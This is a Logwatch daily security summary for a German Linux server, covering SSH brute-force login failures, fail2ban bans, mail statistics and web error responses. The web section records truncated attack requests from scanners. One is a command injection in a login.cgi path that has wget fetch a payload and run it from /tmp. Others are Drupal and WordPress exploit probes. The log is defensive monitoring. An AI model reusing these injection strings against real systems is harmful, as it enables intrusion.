[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Dienstag, 24 Dezember 2019


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Tue Dec 24 04:42:04 2019
        Date Range Processed: yesterday
                              ( 2019-Dec-23 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [162:164]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 A total of 3 sites probed the server 
    172.104.242.173
    172.105.4.63
    61.219.11.153
 
 Requests with error response codes
    400 Bad Request
       null: 8 Time(s)
       mstshash=Administr: 7 Time(s)
       mstshash=hello: 3 Time(s)
       /: 2 Time(s)
       /login.cgi?cli=aa%20aa%27;wget%20http://18 ... h%20/tmp/kh%27$: 1 Time(s)
       /nmaplowercheck1577100860: 1 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
       9\x1A>\x9Ay$]\xD6E: 1 Time(s)
       J\x88\xB8\xFD\x0F\xA6\xD9\xB3\xD7BA\xAF\xF ... xBE\x00\xBD\xC0: 1 Time(s)
       [R\x5C\xEF\x98\x15I\xE7ck\x88\xA8B\xAC\x8C ... xAC\xEC\xE1\x93: 1 Time(s)
       \x08v: 1 Time(s)
       \x90\xE1\x0E\xF7@\x8D\x1B\xD6\xDE\xEC\x90\ ... xBE\x00\xBD\xC0: 1 Time(s)
       \x9E\xEB\xE7{\x99E\xE7\x8AF\xDB\xA1\x90*j^ ... xBE\x00\xBD\xC0: 1 Time(s)
       \xA6\x12\x97\xF4\x12\xD9\xE3.K\xBB\xD6\xAF ... xBE\x00\xBD\xC0: 1 Time(s)
       \xB3\x09a^\xD1: 1 Time(s)
       \xB4\xB66&: 1 Time(s)
       \xBBUn\xA7pM]\xDE\x09\x87\xDBXOY\xB1\xF9\x ... xBE\x00\xBD\xC0: 1 Time(s)
       \xC1Um\x9Cs\xE0.x\xA9\x9F\x01\x98\xCC\xB7\ ... xBE\x00\xBD\xC0: 1 Time(s)
       \xD4\x9C*\xFC\xDCc\xAEXiv\x12s)d7\xD3\x99@\xD6\x96M\x00!\xEB: 1 Time(s)
       \xE2\x994\xCBF`\xE3\x1B\x04kS\xEB: 1 Time(s)
       \xF6\xF15\x98\xA6#\x14S\x0F\xE7\xE0\x0C&\x ... xBE\x00\xBD\xC0: 1 Time(s)
       \xF7: 1 Time(s)
       \xF7\xFF\xA4T\x12\xB8: 1 Time(s)
       f\x0C\xCA\x98~\xE2/1\x04#\xED2\x04\x1D\xBA ... xBE\x00\xBD\xC0: 1 Time(s)
       x\xE2\xDD\x12\xD9\x90\xFB\xB6\xBA\xC0L\x17 ... x1F\xEA\x84\xFD: 1 Time(s)
       zapf.in: 1 Time(s)
    403 Forbidden
       /resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s)
    404 Not Found
       /robots.txt: 33 Time(s)
       /berlin/apple-touch-icon.png: 18 Time(s)
       /wp-login.php: 4 Time(s)
       //user/register/?element_parents=account/m ... mat=drupal_ajax: 2 Time(s)
       //webconfig.txt.php: 2 Time(s)
       //wp-admin/admin-post.php?swp_debug=load_o ... 20%22h1loo1%22;: 2 Time(s)
       //wp-admin/admin-post.php?swp_debug=load_o ... wpaa=phpinfo();: 2 Time(s)
       ////wp-login.php: 1 Time(s)
       /985yo1oz19idwrts: 1 Time(s)
       /berlin/,: 1 Time(s)
       /download/reader_hb02.pdf: 1 Time(s)
       /nndgo9b5n0l7fbxl: 1 Time(s)
       /sites/all/libraries/elfinder-1.2/elfinder.php.html: 1 Time(s)
       /sites/all/libraries/elfinder/__elfinder.php.html: 1 Time(s)
       /sites/all/libraries/elfinder/_elfinder.php.html: 1 Time(s)
       /sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s)
       /sites/default/files/2014_SoSe_Duesseldorf.pdf: 1 Time(s)
       /uefevysst4aoow3o: 1 Time(s)
    405 Method Not Allowed
       /?q=user%2Fpassword&name%5B%23post_render% ... s%2Fvuln.php%27: 1 Time(s)
    500 Internal Server Error
       /: 21 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (222.186.175.155): 57 Time(s)
       root (222.186.175.220): 52 Time(s)
       root (222.186.173.238): 36 Time(s)
       root (222.186.175.148): 36 Time(s)
       root (222.186.175.183): 36 Time(s)
       root (222.186.180.9): 36 Time(s)
       root (222.186.175.202): 35 Time(s)
       root (218.92.0.158): 29 Time(s)
       root (222.186.180.41): 29 Time(s)
       root (222.186.169.192): 28 Time(s)
       root (222.186.175.169): 24 Time(s)
       root (222.186.175.217): 24 Time(s)
       root (222.186.180.223): 24 Time(s)
       root (222.186.42.4): 24 Time(s)
       root (49.88.112.59): 24 Time(s)
       root (218.92.0.155): 23 Time(s)
       root (222.186.173.142): 23 Time(s)
       root (222.186.175.140): 23 Time(s)
       root (222.186.175.216): 23 Time(s)
       root (222.186.173.183): 22 Time(s)
       root (218.92.0.164): 18 Time(s)
       root (222.186.175.147): 18 Time(s)
       root (222.186.175.161): 18 Time(s)
       root (222.186.180.147): 18 Time(s)
       root (222.186.180.17): 18 Time(s)
       root (222.186.180.6): 18 Time(s)
       root (222.186.180.8): 18 Time(s)
       root (222.186.190.92): 18 Time(s)
       root (112.85.42.172): 16 Time(s)
       root (222.186.175.154): 15 Time(s)
       root (218.92.0.131): 12 Time(s)
       root (218.92.0.148): 12 Time(s)
       root (218.92.0.165): 12 Time(s)
       root (218.92.0.212): 12 Time(s)
       root (222.186.175.150): 12 Time(s)
       root (222.186.175.167): 12 Time(s)
       root (222.186.175.215): 12 Time(s)
       root (49.88.112.61): 12 Time(s)
       root (49.88.112.64): 12 Time(s)
       root (61.177.172.128): 12 Time(s)
       root (112.85.42.171): 11 Time(s)
       root (222.186.173.180): 11 Time(s)
       root (222.186.175.163): 11 Time(s)
       unknown (69.158.207.141): 11 Time(s)
       root (218.92.0.175): 10 Time(s)
       root (222.186.175.182): 10 Time(s)
       root (222.186.173.154): 7 Time(s)
       root (112.85.42.173): 6 Time(s)
       root (218.92.0.135): 6 Time(s)
       root (218.92.0.145): 6 Time(s)
       root (218.92.0.170): 6 Time(s)
       root (218.92.0.172): 6 Time(s)
       root (218.92.0.178): 6 Time(s)
       root (222.186.169.194): 6 Time(s)
       root (222.186.175.181): 6 Time(s)
       root (222.186.175.212): 6 Time(s)
       root (222.186.190.2): 6 Time(s)
       root (69.158.207.141): 6 Time(s)
       root (112.85.42.175): 5 Time(s)
       root (112.85.42.178): 5 Time(s)
       mysql (69.158.207.141): 2 Time(s)
       backup (113.176.89.116): 1 Time(s)
       backup (76.73.206.90): 1 Time(s)
       root (106.12.28.203): 1 Time(s)
       root (107.170.192.131): 1 Time(s)
       root (114.67.90.149): 1 Time(s)
       root (117.121.97.115): 1 Time(s)
       root (67.205.138.198): 1 Time(s)
       root (94.191.99.243): 1 Time(s)
       unknown (103.1.153.103): 1 Time(s)
       unknown (106.12.34.56): 1 Time(s)
       unknown (129.213.100.212): 1 Time(s)
       unknown (139.199.219.235): 1 Time(s)
       unknown (139.59.14.210): 1 Time(s)
       unknown (177.126.188.2): 1 Time(s)
       unknown (195.190.137.133): 1 Time(s)
       unknown (200.0.236.210): 1 Time(s)
       unknown (200.252.132.22): 1 Time(s)
       unknown (206.189.136.160): 1 Time(s)
       unknown (217.29.219.20): 1 Time(s)
       unknown (37.114.179.42): 1 Time(s)
       unknown (37.148.211.251): 1 Time(s)
       unknown (80.82.64.214): 1 Time(s)
       unknown (88.207.128.39): 1 Time(s)
       unknown (mx-ll-183.88.137-33.dynamic.3bb.co.th): 1 Time(s)
       unknown (static-dsl-24.87-197-126.telecom.sk): 1 Time(s)
    Invalid Users:
       Unknown Account: 28 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

   11.628K  Bytes accepted                              11,907
   11.628K  Bytes sent via SMTP                         11,907
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        1   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        1   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
     1788   Connections             
     1733   Connections lost (inbound) 
     1788   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
       11   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Network Read Write Errors: 1
 
 Disconnecting after too many authentication failures for user:
    root : 172 Time(s)
 
 Failed logins from:
    49.88.112.59: 24 times
    49.88.112.61: 12 times
    49.88.112.64: 12 times
    61.177.172.128: 12 times
    67.205.138.198: 1 time
    69.158.207.141: 8 times
    76.73.206.90 (circlorama.mybizpronetwork.net): 1 time
    94.191.99.243: 1 time
    106.12.28.203: 1 time
    107.170.192.131: 1 time
    112.85.42.171: 11 times
    112.85.42.172: 16 times
    112.85.42.173: 6 times
    112.85.42.175: 5 times
    112.85.42.178: 5 times
    113.176.89.116 (static.vnpt.vn): 1 time
    114.67.90.149: 1 time
    117.121.97.115: 1 time
    218.92.0.131: 12 times
    218.92.0.135: 6 times
    218.92.0.145: 6 times
    218.92.0.148: 12 times
    218.92.0.155: 23 times
    218.92.0.158: 29 times
    218.92.0.164: 18 times
    218.92.0.165: 12 times
    218.92.0.170: 6 times
    218.92.0.172: 6 times
    218.92.0.175: 10 times
    218.92.0.178: 6 times
    218.92.0.212: 12 times
    222.186.42.4: 24 times
    222.186.169.192: 28 times
    222.186.169.194: 6 times
    222.186.173.142: 24 times
    222.186.173.154: 9 times
    222.186.173.180: 11 times
    222.186.173.183: 30 times
    222.186.173.238: 36 times
    222.186.175.140: 23 times
    222.186.175.147: 18 times
    222.186.175.148: 36 times
    222.186.175.150: 12 times
    222.186.175.154: 18 times
    222.186.175.155: 60 times
    222.186.175.161: 18 times
    222.186.175.163: 11 times
    222.186.175.167: 12 times
    222.186.175.169: 24 times
    222.186.175.181: 6 times
    222.186.175.182: 10 times
    222.186.175.183: 36 times
    222.186.175.202: 35 times
    222.186.175.212: 6 times
    222.186.175.215: 12 times
    222.186.175.216: 23 times
    222.186.175.217: 24 times
    222.186.175.220: 54 times
    222.186.180.6: 18 times
    222.186.180.8: 18 times
    222.186.180.9: 36 times
    222.186.180.17: 18 times
    222.186.180.41: 29 times
    222.186.180.147: 18 times
    222.186.180.223: 24 times
    222.186.190.2: 6 times
    222.186.190.92: 18 times
 
 Illegal users from:
    undef: 26 times
    37.114.179.42: 1 time
    37.148.211.251 (mail.minerocean.com): 1 time
    69.158.207.141: 11 times
    80.82.64.214 (no-reverse-dns-configured.com): 1 time
    87.197.126.24 (static-dsl-24.87-197-126.telecom.sk): 1 time
    88.207.128.39: 1 time
    103.1.153.103: 1 time
    106.12.34.56: 1 time
    129.213.100.212: 1 time
    139.59.14.210: 1 time
    139.199.219.235: 1 time
    177.126.188.2 (2.188.126.177.static.sp2.alog.com.br): 1 time
    183.88.137.33 (mx-ll-183.88.137-33.dynamic.3bb.co.th): 1 time
    195.190.137.133: 1 time
    200.0.236.210 (static-32.mdp.satlink.com): 1 time
    200.252.132.22: 1 time
    206.189.136.160: 1 time
    217.29.219.20: 1 time
 
 **Unmatched Entries**
 fatal: no matching cipher found: client
aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none
server
aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com
[preauth] : 6 time(s)
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem      Size  Used Avail Use% Mounted on
 /dev/vzfs       400G  241G  160G  61% /
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)